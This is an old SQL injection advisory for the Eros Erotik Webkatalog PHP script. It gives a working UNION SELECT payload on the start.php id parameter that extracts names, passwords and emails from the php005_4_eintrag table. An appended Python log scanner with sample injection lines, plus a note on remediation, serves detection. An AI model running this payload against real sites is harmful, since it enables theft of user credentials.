----------------------------Information------------------------------------------------
+Name : Eros Erotik Webkatalog start.php (rubrik&id) SQL Injection
+Author : Easy Laster
+Date : 11.03.2010
+Script : Eros Erotik Webkatalog
+Price : 07,13€
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet, Underground Agents
+And all Friends of Cyberlive : R!p, Eddy14, Silent Vapor, Nolok,
Kiba, -tmh-, Dr Chaos, HANN!BAL, Kabel, -=Player=-, Lidloses_Auge,
N00bor, Ic3Drag0n, novaca!ne.

---------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/webkatalog/start.php?go=rubrik&id=
+Exploitable : www.site.com/webkatalog/start.php?go=rubrik&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(id,0x3a,vorname,0x3a,passwort,0x3,mail),11,12,13,14,15+from+php005_4_eintrag--
^^"table name"^^ = php005_4_eintrag
-----------------------------------------------------------------------------------------
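
Added example (not part of the original advisory): a log check that flags requests to start.php?go=rubrik whose id parameter is not a plain integer, which is how the request above shows up in web server logs. It assumes legitimate id values are non-negative integers and that the log uses the common/combined access-log format; the sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request-line portion of a common/combined access-log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def suspicious_id(request_target):
    """Return the decoded id value if the request hits start.php?go=rubrik
    with an id that is not a plain non-negative integer, else None."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith("/start.php"):
        return None
    # parse_qs percent-decodes and turns '+' into spaces, so differently
    # encoded variants of the same value normalise to one form.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "rubrik" not in params.get("go", []):
        return None
    for value in params.get("id", []):
        # Assumption: a legitimate category id is 1-10 decimal digits.
        if not re.fullmatch(r"[0-9]{1,10}", value):
            return value
    return None

def scan(log_lines):
    """Return [(line_number, decoded_id)] for every flagged request."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            bad = suspicious_id(m.group(1))
            if bad is not None:
                hits.append((n, bad))
    return hits

# Constructed sample log lines (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2010:10:00:01 +0100] "GET /webkatalog/start.php?go=rubrik&id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [11/Mar/2010:10:00:07 +0100] "GET /webkatalog/start.php?go=rubrik&id=-1+union+select+1,2,3+from+php005_4_eintrag-- HTTP/1.1" 200 4812',
    '203.0.113.9 - - [11/Mar/2010:10:00:09 +0100] "GET /webkatalog/start.php?go=rubrik&id=-1%20UNION%20SELECT%201 HTTP/1.1" 200 4790',
    '203.0.113.5 - - [11/Mar/2010:10:00:12 +0100] "GET /webkatalog/start.php?go=home&id=abc HTTP/1.1" 200 3001',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id -> {value!r}")
```

The same integer-only rule applied to id inside start.php before it reaches the SQL query, together with a parameterised query, closes the hole rather than only detecting its use.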